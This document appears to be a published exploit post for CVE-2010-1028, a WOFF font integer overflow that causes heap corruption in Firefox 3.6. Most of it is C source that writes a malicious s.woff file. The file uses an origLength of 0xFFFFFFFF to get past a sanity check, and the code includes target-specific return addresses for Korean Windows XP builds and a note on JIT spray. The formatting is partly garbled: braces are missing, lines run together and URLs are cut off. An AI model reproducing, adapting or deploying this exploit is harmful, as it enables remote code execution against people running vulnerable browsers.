Mozilla Firefox 3.6 – Integer Overflow Exploit


x90c WOFF 1day exploit

(MFSA2010-08 WOFF Heap Corruption due to Integer Overflow 1day exploit)

CVE-ID: CVE-2010-1028

Full Exploit: http:/

Affacted Products:
– Mozilla Firefox 3.6 ( Gecko 1.9.2 )
– Mozilla Firefox 3.6 Beta1, 3, 4, 5 ( Beta2 ko not released )
– Mozilla Firefox 3.6 RC1, RC2

Fixed in:
– Mozilla Firefox 3.6.2 ( after 3.6 version this bug fixed )

security bug credit: Evgeny Legerov < >

2010.02.01 – Evengy Legerov Initial discovered and shiped it into
“Immunity 3rd Party Product VulnDisco 9.0”
2010.02.18 – without reporter, it self analyzed
and contact to mozilla and secunia before advisory reporting
2010.03.19 – CVE registered
2010.03.22 – Mozilla advisory report
2010.04.01 – x90c exploit (

[root@centos5 woff]# gcc CVE-2010-1028_exploit.c -o CVE-2010-1028_exploit -lz

rebel: greets to my old l33t hacker dude in sweden
… BSDaemon: and Invitation of l33t dude for exploit share
#phrack@efnet, #social@overthewire



typedef unsigned int UInt32;
typedef unsigned short UInt16;

for above two types, some WOFF header struct uses big-endian byte order.

typedef struct
UInt32 signature;
UInt32 flavor;
UInt32 length;
UInt16 numTables;
UInt16 reserved;
UInt32 totalSfntSize;
UInt16 majorVersion;
UInt16 minorVersion;
UInt32 metaOffset;
UInt32 metaLength;
UInt32 metaOrigLength;
UInt32 privOffset;
UInt32 privLength;

typedef struct
UInt32 tag;
UInt32 offset;
UInt32 compLength;
UInt32 origLength;
UInt32 origChecksum;

#define FLAVOR_TRUETYPE_FONT 0x0001000
#define FLAVOR_CFF_FONT 0x4F54544F

struct ff_version
int num;
char *v_nm;
unsigned long addr;

struct ff_version plat[] =
0, “Win XP SP3 ko – FF 3.6”, 0x004E18ED
1, “Win XP SP3 ko – FF 3.6 Beta1”, 0x004E17BD
2, “Win XP SP3 ko – FF 3.6 Beta3”, 0x004E193D
3, “Win XP SP3 ko – FF 3.6 Beta4”, 0x004E20FD
4, “Win XP SP3 ko – FF 3.6 Beta5”, 0x600A225D
5, “Win XP SP3 ko – FF 3.6 RC1”, 0x004E17BD
6, “Win XP SP3 ko – FF 3.6 RC2”, 0x004E18ED
0x00, NULL, 0x0

void usage(char *f_nm)
int i = 0;

fprintf(stdout, “\n Usage: %s [Target ID]\n\n”, f_nm);

for(i = 0; plat[i].v_nm != NULL; i++)
fprintf(stdout, “\t{%d} %s. \n”, (plat[i].num), (plat[i].v_nm));


int main(int argc, char *argv[]) {
WOFF_HEADER woff_header;
WOFF_DIRECTORY woff_dir[1];
FILE *fp;
char dataBlock[1024];
char compressed_dataBlock[1024];
char de_buf[1024];
int total_bytes = 0, total_dataBlock = 0;
unsigned long destLen = 1024;
unsigned long de_Len = 1024;
unsigned long i = 0;
unsigned long addr_saved_ret_val = 0;
int ret = 0;
int n = 0;

if(argc < 2) usage(argv[0]); n = atoi(argv[1]); if(n < 0 || n > 6)
fprintf(stderr, “\nTarget number range is 0-6!\n”);

printf(“\n#### x90c WOFF exploit ####\n”);
printf(“\nTarget: %d – %s\n\n”, (plat[n].num), (plat[n].v_nm));

woff_header.signature = 0x46464F77; // ‘wOFF’ ( L.E )
woff_header.flavor = FLAVOR_TRUETYPE_FONT; // sfnt version ( B.E )
woff_header.length = 0x00000000; // woff file total length ( B.E )
woff_header.numTables = 0x0100; // 0x1 – woff dir entry length ( B.E )
woff_header.reserved = 0x0000; // res bit ( all zero )

// totalSFntSize value will bypass validation condition after integer overflow
woff_header.totalSfntSize = 0x1C000000; // 0x0000001C ( B.E )
woff_header.majorVersion = 0x0000; // major version
woff_header.minorVersion = 0x0000; // minor version
woff_header.metaOffset = 0x00000000; // meta data block offset ( not used )
woff_header.metaLength = 0x00000000; // meta data block length ( not used )
woff_header.metaOrigLength = 0x00000000; // meta data block before-compresed length ( not used )
woff_header.privOffset = 0x00000000; // Private data block offset ( not used )
woff_header.privLength = 0x00000000; // Private data block length

woff_dir[0].tag = 0x54444245; // ‘EBDT’ ( B.E )
woff_dir[0].offset = 0x40000000; // 0x00000040 ( B.E )
woff_dir[0].compLength = 0x00000000; // ( B.E )

// to trigger field bit.
// 0xFFFFFFF8-0xFFFFFFFF value to trigger integer overflow.
// 1) calculation result is 0, it’s bypass to sanityCheck() function
// 2) passed very long length into zlib Decompressor, it’s trigger memory corruption!

// 0xFFFFFFFD-0xFFFFFFFF: bypass sanityCheck()
// you can use only the value of 0xFFFFFFFF ( integer overflow!!! )
// you can’t using other values to bypass validation condition
woff_dir[0].origLength = 0xFFFFFFFF; // 0xFFFFFFFF ( B.E )

printf(“WOFF_HEADER [ %d bytes ]\n”, sizeof(WOFF_HEADER));
printf(“WOFF_DIRECTORY [ %d bytes ]\n”, sizeof(WOFF_DIRECTORY));

// to compress data block
// [ 0x0c0c0c0c 0x0c0c0c0c 0x0c0c0c0c … ]
// …JIT spray stuff…

addr_saved_ret_val = plat[n].addr;
addr_saved_ret_val += 0x8; // If add 8bytes it reduced reference error occurs

for(i = 0; i < sizeof(dataBlock); i+=4) // 0x004E18F5 { dataBlock[i+0] = (addr_saved_ret_val & 0x000000ff); dataBlock[i+1] = (addr_saved_ret_val & 0x0000ff00) >> 8;
dataBlock[i+2] = (addr_saved_ret_val & 0x00ff0000) >> 16;
dataBlock[i+3] = (addr_saved_ret_val & 0xff000000) >> 24;

// compress dataBlock with zlib’s compress()
if(compress((Bytef *)compressed_dataBlock,
(uLongf *)&destLen,
(Bytef *)dataBlock,
) != Z_OK)
fprintf(stderr, “Zlib compress failed!\n”);

printf(“\nZlib compress(dataBlock) …\n”);
printf(“DataBlock [ %u bytes ]\n”, sizeof(dataBlock));
printf(“Compressed DataBlock [ %u bytes ]\n”, destLen);
printf(“[ Z_OK ]\n\n”);

total_bytes = sizeof(WOFF_HEADER) +

total_dataBlock = destLen;

printf(“Total WOFF File Size: %d bytes\n”, total_bytes);

// byte order change to total_bytes, total_dataBlock ( L.E into B.E )
total_bytes =
((total_bytes & 0xff000000) >> 24) |
((total_bytes & 0x00ff0000) >> 8) |
((total_bytes & 0x0000ff00) << 8) | ((total_bytes & 0x000000ff) << 24); woff_header.length = total_bytes; total_dataBlock = ((total_dataBlock & 0xff000000) >> 24) |
((total_dataBlock & 0x00ff0000) >> 8) |
((total_dataBlock & 0x0000ff00) << 8) | ((total_dataBlock & 0x000000ff) << 24); woff_dir[0].compLength = total_dataBlock; // create attack code data if((fp = fopen("s.woff", "wb")) < 0) { fprintf(stderr, "that file to create open failed\n"); exit(-2); } // setup WOFF data store fwrite(&woff_header, 1, sizeof(woff_header), fp); fwrite(&woff_dir[0], 1, sizeof(woff_dir[0]), fp); fwrite(&compressed_dataBlock, 1, destLen, fp); fclose(fp); // zlib extract test ret = uncompress(de_buf, &de_Len, compressed_dataBlock, destLen); if(ret != Z_OK) { switch(ret) { case Z_MEM_ERROR: printf("Z_MEM_ERROR\n"); break; case Z_BUF_ERROR: printf("Z_BUF_ERROR\n"); break; case Z_DATA_ERROR: printf("Z_DATA_ERROR\n"); break; } fprintf(stderr, "Zlib uncompress test failed!\n"); unlink("./s.woff"); exit(-3); } printf("\nZlib uncompress test(compressed_dataBlock) ...\n"); printf("[ Z_OK ]\n\n"); return 0; } /* eof */
